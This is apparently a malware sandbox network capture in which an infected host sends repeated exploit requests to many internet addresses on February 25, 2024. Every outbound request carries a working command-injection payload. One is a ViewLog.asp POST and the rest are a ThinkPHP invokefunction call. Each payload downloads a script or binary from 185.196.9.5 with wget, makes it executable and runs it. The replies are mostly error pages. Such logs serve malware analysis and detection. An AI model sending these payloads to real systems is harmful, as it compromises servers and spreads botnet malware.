Feb 25, 2024 19:03:58.143661976 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:58.338996887 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:03:58 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
604	192.168.2.15	54314	94.121.146.205	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:58.173686028 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
605	192.168.2.15	45018	88.101.30.44	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:58.438488960 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:58.641642094 CET	339	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sun, 25 Feb 2024 18:03:58 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
606	192.168.2.15	43426	88.221.8.232	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:58.723473072 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:59.003446102 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:03:58 GMT Date: Sun, 25 Feb 2024 18:03:58 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 30 35 61 33 33 62 38 26 23 34 36 3b 31 37 30 38 38 38 34 32 33 38 26 23 34 36 3b 37 38 62 30 62 31 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.a05a33b8.1708884238.78b0b19</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
607	192.168.2.15	58668	95.169.28.42	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:58.793078899 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:58.940129042 CET	322	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:58 GMT Content-Type: text/html; charset=utf-8 Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
608	192.168.2.15	34712	95.210.96.241	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:58.816601992 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
609	192.168.2.15	56096	95.61.249.213	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:58.845480919 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:59.049279928 CET	28	IN	HTTP/1.0 200 OK Data Raw: Data Ascii:
Feb 25, 2024 19:03:59.050326109 CET	200	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 62 69 6e 61 72 79 0a 53 65 72 76 65 72 3a 20 75 63 2d 68 74 74 70 64 20 31 2e 30 2e 30 0a 45 78 70 69 72 65 73 3a 20 30 0a 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 Data Ascii: Content-type: application/binaryServer: uc-httpd 1.0.0Expires: 0<html><head><title>404 File Not Found</title></head><body>The requested URL was not found on this server</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
610	192.168.2.15	55034	95.110.174.160	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:58.845613003 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:59.044289112 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:03:56 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
611	192.168.2.15	54570	95.79.44.123	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:58.955543041 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:59.185271978 CET	404	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:09:58 GMT Server: Apache Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
612	192.168.2.15	60818	88.146.242.170	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:01.379586935 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:01.563153982 CET	474	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:01 GMT Server: Apache Content-Length: 296 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 72 65 64 62 6f 78 2e 6e 61 6e 6f 73 65 72 76 65 72 2e 63 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at redbox.nanoserver.cz Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
613	192.168.2.15	51482	88.221.229.81	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:01.453315973 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:01.659826040 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:01 GMT Date: Sun, 25 Feb 2024 18:04:01 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 64 30 63 31 35 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 32 34 31 26 23 34 36 3b 32 36 36 33 36 39 64 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.9d0c1502.1708884241.266369df</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
614	192.168.2.15	48278	95.97.211.234	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:01.644618034 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:01.837315083 CET	487	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 345 Connection: close Date: Sun, 25 Feb 2024 18:03:57 GMT Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
615	192.168.2.15	53500	95.100.191.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:01.651484013 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:01.848913908 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:01 GMT Date: Sun, 25 Feb 2024 18:04:01 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 33 64 31 66 35 35 37 26 23 34 36 3b 31 37 30 38 38 38 34 32 34 31 26 23 34 36 3b 31 36 64 35 33 64 35 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.e3d1f557.1708884241.16d53d57</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
616	192.168.2.15	33354	95.43.223.163	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:01.663873911 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
617	192.168.2.15	41760	95.58.65.209	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:01.730132103 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:02.006098986 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:04:02.006155968 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
618	192.168.2.15	47740	95.58.66.15	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:01.832298040 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:02.100472927 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:04:02.100773096 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
619	192.168.2.15	39630	112.219.231.76	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.128429890 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
